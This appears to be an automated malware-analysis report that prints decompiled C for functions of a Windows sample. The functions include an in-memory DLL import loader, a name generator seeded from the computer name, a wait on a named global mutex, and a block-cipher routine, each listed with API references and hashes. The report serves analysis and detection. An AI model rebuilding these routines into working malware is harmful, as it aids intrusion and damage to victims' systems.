                • Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                • Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
                • Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                • Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00407831 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E00407831(CHAR* __ebx) {
				void* _t19;
				void _t21;
				intOrPtr _t28;
				signed int _t30;
				int _t32;
				intOrPtr* _t33;
				intOrPtr _t34;
				CHAR* _t35;
				intOrPtr _t38;
				intOrPtr* _t41;
				void* _t42;

				_t35 = __ebx;
				__setusermatherr(E0040793C);
				E0040792A(_t19);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t21 =  *0x40f940; // 0x0
				 *(_t42 - 0x6c) = _t21;
				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t41 =  *_acmdln;
				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
				if( *_t41 != 0x22) {
					while(1) {
						__eflags =  *_t41 - 0x20;
						if(__eflags <= 0) {
							goto L6;
						}
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				} else {
					do {
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
						_t34 =  *_t41;
					} while (_t34 != _t35 && _t34 != 0x22);
					if( *_t41 == 0x22) {
						L5:
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				}
				L6:
				_t28 =  *_t41;
				if(_t28 != _t35 && _t28 <= 0x20) {
					goto L5;
				}
				 *(_t42 - 0x30) = _t35;
				GetStartupInfoA(_t42 - 0x5c);
				_t52 =  *(_t42 - 0x30) & 0x00000001;
				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
					_t30 = 0xa;
				} else {
					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
				}
				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
				 *(_t42 - 0x68) = _t32;
				exit(_t32);
				_t33 =  *((intOrPtr*)(_t42 - 0x14));
				_t38 =  *((intOrPtr*)( *_t33));
				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
				_push(_t33);
				_push(_t38);
				L0040791E();
				return _t33;
			}














                0x00407831
                0x00407836
                0x0040783d
                0x00407842
                0x00407847
                0x0040784c
                0x00407851
                0x00407856
                0x0040786f
                0x00407875
                0x0040787a
                0x0040787f
                0x0040788c
                0x0040788e
                0x00407894
                0x004078d0
                0x004078d0
                0x004078d3
                0x00000000
                0x00000000
                0x004078d5
                0x004078d6
                0x004078d6
                0x00407896
                0x00407896
                0x00407896
                0x00407897
                0x0040789a
                0x0040789c
                0x004078a7
                0x004078a9
                0x004078a9
                0x004078aa
                0x004078aa
                0x004078a7
                0x004078ad
                0x004078ad
                0x004078b1
                0x00000000
                0x00000000
                0x004078b7
                0x004078be
                0x004078c4
                0x004078c8
                0x004078dd
                0x004078ca
                0x004078ca
                0x004078ca
                0x004078e9
                0x004078ee
                0x004078f2
                0x004078f8
                0x004078fd
                0x004078ff
                0x00407902
                0x00407903
                0x00407904
                0x0040790b

                APIs
                • __setusermatherr.MSVCRT(0040793C), ref: 00407836
                  • Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934
                • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                • GetStartupInfoA.KERNEL32(?), ref: 004078BE
                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
                • exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
                • _XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
                • String ID:
                • API String ID: 2141228402-0
                • Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                • Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
                • Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                • Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004027DF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E004027DF(signed int* _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _t50;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t58;
				void _t60;
				signed int _t63;
				signed int _t67;
				intOrPtr _t68;
				void* _t73;
				signed int _t75;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				void* _t91;

				_t90 = _a4;
				_t2 = _t90 + 4; // 0x4be8563c
				_t87 =  *_t2;
				_t50 =  *_t90 + 0x80;
				_t75 = 1;
				_v16 = _t87;
				_v12 = _t75;
				if( *((intOrPtr*)(_t50 + 4)) != 0) {
					_t73 =  *_t50 + _t87;
					if(IsBadReadPtr(_t73, 0x14) != 0) {
						L25:
						return _v12;
					}
					while(1) {
						_t53 =  *((intOrPtr*)(_t73 + 0xc));
						if(_t53 == 0) {
							goto L25;
						}
						_t8 = _t90 + 0x30; // 0xc085d0ff
						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
						_v8 = _t55;
						if(_t55 == 0) {
							SetLastError(0x7e);
							L23:
							_v12 = _v12 & 0x00000000;
							goto L25;
						}
						_t11 = _t90 + 0xc; // 0x317459c0
						_t14 = _t90 + 8; // 0x85000001
						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
						if(_t58 == 0) {
							_t40 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
							SetLastError(0xe);
							goto L23;
						}
						_t15 = _t90 + 0xc; // 0x317459c0
						 *(_t90 + 8) = _t58;
						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
						_t60 =  *_t73;
						if(_t60 == 0) {
							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
							_a4 = _t88;
						} else {
							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
							_a4 = _t60 + _t87;
						}
						while(1) {
							_t63 =  *_a4;
							if(_t63 == 0) {
								break;
							}
							if((_t63 & 0x80000000) == 0) {
								_t32 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t32);
								_t67 = _t63 + _v16 + 2;
							} else {
								_t30 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t30);
								_t67 = _t63 & 0x0000ffff;
							}
							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
							_t91 = _t91 + 0xc;
							 *_t88 = _t68;
							if(_t68 == 0) {
								_v12 = _v12 & 0x00000000;
								break;
							} else {
								_a4 =  &(_a4[1]);
								_t88 = _t88 + 4;
								continue;
							}
						}
						if(_v12 == 0) {
							_t45 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
							SetLastError(0x7f);
							goto L25;
						}
						_t73 = _t73 + 0x14;
						if(IsBadReadPtr(_t73, 0x14) == 0) {
							_t87 = _v16;
							continue;
						}
						goto L25;
					}
					goto L25;
				}
				return _t75;
			}




















                0x004027e6
                0x004027ee
                0x004027ee
                0x004027f1
                0x004027f6
                0x004027f7
                0x004027fa
                0x00402801
                0x0040280d
                0x0040281a
                0x0040291c
                0x00000000
                0x0040291f
                0x00402825
                0x00402825
                0x0040282a
                0x00000000
                0x00000000
                0x00402830
                0x00402836
                0x0040283a
                0x00402840
                0x004028fd
                0x004028fd
                0x00402903
                0x00000000
                0x00402903
                0x00402846
                0x00402851
                0x00402854
                0x0040285e
                0x004028f0
                0x004028f6
                0x004028fd
                0x00000000
                0x004028fd
                0x00402864
                0x0040286a
                0x0040286d
                0x00402870
                0x00402873
                0x00402877
                0x00402889
                0x0040288b
                0x00402879
                0x0040287e
                0x00402881
                0x00402881
                0x0040288e
                0x00402891
                0x00402895
                0x00000000
                0x00000000
                0x0040289c
                0x004028ab
                0x004028ab
                0x004028b0
                0x0040289e
                0x0040289e
                0x0040289e
                0x004028a1
                0x004028a1
                0x004028b7
                0x004028ba
                0x004028bd
                0x004028c1
                0x004028cc
                0x00000000
                0x004028c3
                0x004028c3
                0x004028c7
                0x00000000
                0x004028c7
                0x004028c1
                0x004028d4
                0x00402909
                0x0040290f
                0x00402916
                0x00000000
                0x00402916
                0x004028d6
                0x004028e4
                0x00402822
                0x00000000
                0x00402822
                0x00000000
                0x004028ea
                0x00000000
                0x00402825
                0x00000000

                APIs
                • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
                • realloc.MSVCRT(85000001,317459C0), ref: 00402854
                • IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: Read$realloc
                • String ID: ?!@
                • API String ID: 1241503663-708128716
                • Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                • Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
                • Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                • Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401225 Relevance: 10.6, APIs: 7, Instructions: 87COMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00401225(intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void _v410;
				long _v412;
				long _t34;
				signed int _t42;
				intOrPtr _t44;
				signed int _t45;
				signed int _t48;
				int _t54;
				signed int _t56;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				void* _t71;
				signed short* _t72;
				void* _t76;
				void* _t77;

				_t34 =  *0x40f874; // 0x0
				_v412 = _t34;
				_t56 = 0x63;
				_v12 = 0x18f;
				memset( &_v410, 0, _t56 << 2);
				asm("stosw");
				GetComputerNameW( &_v412,  &_v12);
				_v8 = _v8 & 0x00000000;
				_t54 = 1;
				if(wcslen( &_v412) > 0) {
					_t72 =  &_v412;
					do {
						_t54 = _t54 * ( *_t72 & 0x0000ffff);
						_v8 = _v8 + 1;
						_t72 =  &(_t72[1]);
					} while (_v8 < wcslen( &_v412));
				}
				srand(_t54);
				_t42 = rand();
				_t71 = 0;
				asm("cdq");
				_t60 = 8;
				_t76 = _t42 % _t60 + _t60;
				if(_t76 > 0) {
					do {
						_t48 = rand();
						asm("cdq");
						_t62 = 0x1a;
						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61;
						_t71 = _t71 + 1;
					} while (_t71 < _t76);
				}
				_t77 = _t76 + 3;
				while(_t71 < _t77) {
					_t45 = rand();
					asm("cdq");
					_t61 = 0xa;
					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30;
					_t71 = _t71 + 1;
				}
				_t44 = _a4;
				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000;
				return _t44;
			}





















                0x0040122e
                0x00401239
                0x00401240
                0x00401249
                0x00401250
                0x00401252
                0x0040125f
                0x0040126b
                0x00401277
                0x0040127e
                0x00401280
                0x00401286
                0x00401289
                0x0040128c
                0x00401297
                0x0040129d
                0x00401286
                0x004012a1
                0x004012ae
                0x004012b2
                0x004012b4
                0x004012b5
                0x004012ba
                0x004012be
                0x004012c0
                0x004012c0
                0x004012c4
                0x004012c5
                0x004012ce
                0x004012d1
                0x004012d2
                0x004012c0
                0x004012d6
                0x004012d9
                0x004012dd
                0x004012e1
                0x004012e2
                0x004012eb
                0x004012ee
                0x004012ee
                0x004012f1
                0x004012f4
                0x004012fc

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: rand$wcslen$ComputerNamesrand
                • String ID:
                • API String ID: 3058258771-0
                • Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                • Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
                • Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                • Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00407070 Relevance: 10.6, APIs: 7, Instructions: 74stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00407070(char* _a4, char* _a8) {
				char _v264;
				void _v524;
				long _t16;
				char* _t30;
				char* _t31;
				char* _t36;
				char* _t38;
				int _t40;
				void* _t41;

				_t30 = _a4;
				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
					CreateDirectoryA(_t30, 0);
				}
				_t36 = _a8;
				_t16 =  *_t36;
				if(_t16 != 0) {
					_t38 = _t36;
					_t31 = _t36;
					do {
						if(_t16 == 0x2f || _t16 == 0x5c) {
							_t38 = _t31;
						}
						_t16 = _t31[1];
						_t31 =  &(_t31[1]);
					} while (_t16 != 0);
					if(_t38 != _t36) {
						_t40 = _t38 - _t36;
						memcpy( &_v524, _t36, _t40);
						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
						E00407070(_t30,  &_v524);
					}
					_v264 = _v264 & 0x00000000;
					if(_t30 != 0) {
						strcpy( &_v264, _t30);
					}
					strcat( &_v264, _t36);
					_t16 = GetFileAttributesA( &_v264);
					if(_t16 == 0xffffffff) {
						return CreateDirectoryA( &_v264, 0);
					}
				}
				return _t16;
			}












                0x0040707a
                0x00407080
                0x00407091
                0x00407091
                0x00407097
                0x0040709a
                0x0040709e
                0x004070a5
                0x004070a7
                0x004070a9
                0x004070ab
                0x004070b1
                0x004070b1
                0x004070b3
                0x004070b6
                0x004070b7
                0x004070bd
                0x004070bf
                0x004070ca
                0x004070cf
                0x004070df
                0x004070e4
                0x004070e7
                0x004070f1
                0x004070fb
                0x00407101
                0x0040710a
                0x00407118
                0x00407121
                0x00000000
                0x0040712c
                0x00407121
                0x00407135

                APIs
                • GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
                • CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
                • memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
                • strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
                • strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
                • GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
                • String ID:
                • API String ID: 2935503933-0
                • Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                • Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
                • Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                • Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401EFF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35sleepCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401EFF(intOrPtr _a4) {
				char _v104;
				void* _t9;
				void* _t11;
				void* _t12;

				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
				_t12 = 0;
				if(_a4 <= 0) {
					L3:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t9 = OpenMutexA(0x100000, 1,  &_v104);
					if(_t9 != 0) {
						break;
					}
					Sleep(0x3e8);
					_t12 = _t12 + 1;
					if(_t12 < _a4) {
						continue;
					}
					goto L3;
				}
				CloseHandle(_t9);
				_t11 = 1;
				return _t11;
			}







                0x00401f16
                0x00401f1c
                0x00401f24
                0x00401f4c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00401f26
                0x00401f26
                0x00401f31
                0x00401f39
                0x00000000
                0x00000000
                0x00401f40
                0x00401f46
                0x00401f4a
                0x00000000
                0x00000000
                0x00000000
                0x00401f4a
                0x00401f52
                0x00401f5a
                0x00000000

                APIs
                • sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
                • OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
                • Sleep.KERNEL32(000003E8), ref: 00401F40
                • CloseHandle.KERNEL32(00000000), ref: 00401F52
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: CloseHandleMutexOpenSleepsprintf
                • String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
                • API String ID: 2780352083-2959021817
                • Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                • Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
                • Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                • Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403A77 Relevance: 9.1, APIs: 6, Instructions: 123COMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				void* _v12;
				char _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v48;
				signed int _t121;
				int _t124;
				intOrPtr* _t126;
				intOrPtr _t127;
				int _t131;
				intOrPtr* _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t143;
				signed int _t150;
				intOrPtr _t160;
				int _t161;
				int _t163;
				signed int _t164;
				signed int _t165;
				intOrPtr _t168;
				void* _t169;
				signed int _t170;
				signed int _t172;
				signed int _t175;
				signed int _t178;
				intOrPtr _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				intOrPtr _t198;
				void* _t201;

				_t197 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
				}
				_t121 = _a12;
				if(_t121 == 0) {
					L15:
					__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
					_push( &_v16);
					_push(0);
					_push(_t197);
					_t198 = _v36;
					_t194 = _v32;
					_t168 =  *((intOrPtr*)(_t198 + 0x30));
					_t160 =  *((intOrPtr*)(_t198 + 0x34));
					_t71 = _t194 + 0xc; // 0x40d568
					_v48 =  *_t71;
					_v32 = _t168;
					if(_t168 > _t160) {
						_t160 =  *((intOrPtr*)(_t198 + 0x2c));
					}
					_t75 = _t194 + 0x10; // 0x19930520
					_t124 =  *_t75;
					_t161 = _t160 - _t168;
					if(_t161 > _t124) {
						_t161 = _t124;
					}
					if(_t161 != 0 && _a8 == 0xfffffffb) {
						_a8 = _a8 & 0x00000000;
					}
					 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
					 *(_t194 + 0x10) = _t124 - _t161;
					_t126 =  *((intOrPtr*)(_t198 + 0x38));
					if(_t126 != 0) {
						_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
						 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
						_t201 = _t201 + 0xc;
						 *((intOrPtr*)(_t194 + 0x30)) = _t137;
					}
					if(_t161 != 0) {
						memcpy(_v12, _a4, _t161);
						_v12 = _v12 + _t161;
						_t201 = _t201 + 0xc;
						_a4 = _a4 + _t161;
					}
					_t127 =  *((intOrPtr*)(_t198 + 0x2c));
					if(_a4 == _t127) {
						_t169 =  *((intOrPtr*)(_t198 + 0x28));
						_a4 = _t169;
						if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
							 *((intOrPtr*)(_t198 + 0x34)) = _t169;
						}
						_t99 = _t194 + 0x10; // 0x19930520
						_t131 =  *_t99;
						_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
						if(_t163 > _t131) {
							_t163 = _t131;
						}
						if(_t163 != 0 && _a8 == 0xfffffffb) {
							_a8 = _a8 & 0x00000000;
						}
						 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
						 *(_t194 + 0x10) = _t131 - _t163;
						_t133 =  *((intOrPtr*)(_t198 + 0x38));
						if(_t133 != 0) {
							_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
							 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
							_t201 = _t201 + 0xc;
							 *((intOrPtr*)(_t194 + 0x30)) = _t135;
						}
						if(_t163 != 0) {
							memcpy(_v12, _a4, _t163);
							_v12 = _v12 + _t163;
							_a4 = _a4 + _t163;
						}
					}
					 *(_t194 + 0xc) = _v12;
					 *((intOrPtr*)(_t198 + 0x30)) = _a4;
					return _a8;
				} else {
					_t170 =  *(_t197 + 0x3cc);
					if(_t121 % _t170 != 0) {
						goto L15;
					} else {
						if(_a16 != 1) {
							_t195 = _a4;
							_t139 = _a12;
							_a16 = 0;
							_t164 = _a8;
							if(_a16 != 2) {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E00403797(_t197, _t195, _t164);
										_t172 =  *(_t197 + 0x3cc);
										_t195 = _t195 + _t172;
										_t143 = _a12 / _t172;
										_t164 = _t164 + _t172;
										_a16 = _a16 + 1;
									} while (_a16 < _t143);
									return _t143;
								}
							} else {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E0040350F(_t197, _t197 + 0x3f0, _t164);
										E00403A28(_t197, _t164, _t195);
										memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
										_t175 =  *(_t197 + 0x3cc);
										_t201 = _t201 + 0xc;
										_t150 = _a12 / _t175;
										_t195 = _t195 + _t175;
										_t164 = _t164 + _t175;
										_a16 = _a16 + 1;
									} while (_a16 < _t150);
									return _t150;
								}
							}
						} else {
							_t196 = _a4;
							_t140 = _a12 / _t170;
							_a16 = 0;
							_t165 = _a8;
							if(_t140 > 0) {
								do {
									E00403797(_t197, _t196, _t165);
									E00403A28(_t197, _t165, _t197 + 0x3f0);
									memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
									_t178 =  *(_t197 + 0x3cc);
									_t201 = _t201 + 0xc;
									_t140 = _a12 / _t178;
									_t196 = _t196 + _t178;
									_t165 = _t165 + _t178;
									_a16 = _a16 + 1;
								} while (_a16 < _t140);
							}
						}
						return _t140;
					}
				}
			}





































                0x00403a7f
                0x00403a87
                0x00403a91
                0x00403a9a
                0x00403a9f
                0x00403aa0
                0x00403aa0
                0x00403aa5
                0x00403aaa
                0x00403bba
                0x00403bc2
                0x00403bcb
                0x00403bd0
                0x00403bd1
                0x00403bd9
                0x00403bda
                0x00403bdb
                0x00403bdc
                0x00403be0
                0x00403be3
                0x00403be6
                0x00403be9
                0x00403bee
                0x00403bf1
                0x00403bf4
                0x00403bf6
                0x00403bf6
                0x00403bf9
                0x00403bf9
                0x00403bfc
                0x00403c00
                0x00403c02
                0x00403c02
                0x00403c06
                0x00403c0e
                0x00403c0e
                0x00403c12
                0x00403c17
                0x00403c1a
                0x00403c1f
                0x00403c26
                0x00403c28
                0x00403c2b
                0x00403c2e
                0x00403c2e
                0x00403c33
                0x00403c3c
                0x00403c41
                0x00403c44
                0x00403c47
                0x00403c47
                0x00403c4a
                0x00403c50
                0x00403c52
                0x00403c58
                0x00403c5b
                0x00403c5d
                0x00403c5d
                0x00403c63
                0x00403c63
                0x00403c66
                0x00403c6a
                0x00403c6c
                0x00403c6c
                0x00403c70
                0x00403c78
                0x00403c78
                0x00403c7c
                0x00403c81
                0x00403c84
                0x00403c89
                0x00403c90
                0x00403c92
                0x00403c95
                0x00403c98
                0x00403c98
                0x00403c9d
                0x00403ca6
                0x00403cab
                0x00403cb1
                0x00403cb1
                0x00403c9d
                0x00403cb7
                0x00403cbd
                0x00403cc7
                0x00403ab0
                0x00403ab0
                0x00403abc
                0x00000000
                0x00403ac2
                0x00403ac6
                0x00403b2c
                0x00403b2f
                0x00403b32
                0x00403b35
                0x00403b38
                0x00403b8d
                0x00403b91
                0x00403b93
                0x00403b97
                0x00403b9c
                0x00403ba7
                0x00403ba9
                0x00403bab
                0x00403bad
                0x00403bb0
                0x00000000
                0x00403b93
                0x00403b3a
                0x00403b3c
                0x00403b40
                0x00403b42
                0x00403b4c
                0x00403b55
                0x00403b68
                0x00403b6d
                0x00403b78
                0x00403b7b
                0x00403b7d
                0x00403b7f
                0x00403b81
                0x00403b84
                0x00000000
                0x00403b42
                0x00403b40
                0x00403ac8
                0x00403acb
                0x00403ace
                0x00403ad0
                0x00403ad3
                0x00403ad8
                0x00403ada
                0x00403ade
                0x00403aed
                0x00403b00
                0x00403b05
                0x00403b10
                0x00403b13
                0x00403b15
                0x00403b17
                0x00403b19
                0x00403b1c
                0x00403ada
                0x00403ad8
                0x00403b25
                0x00403b25
                0x00403abc

                APIs
                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
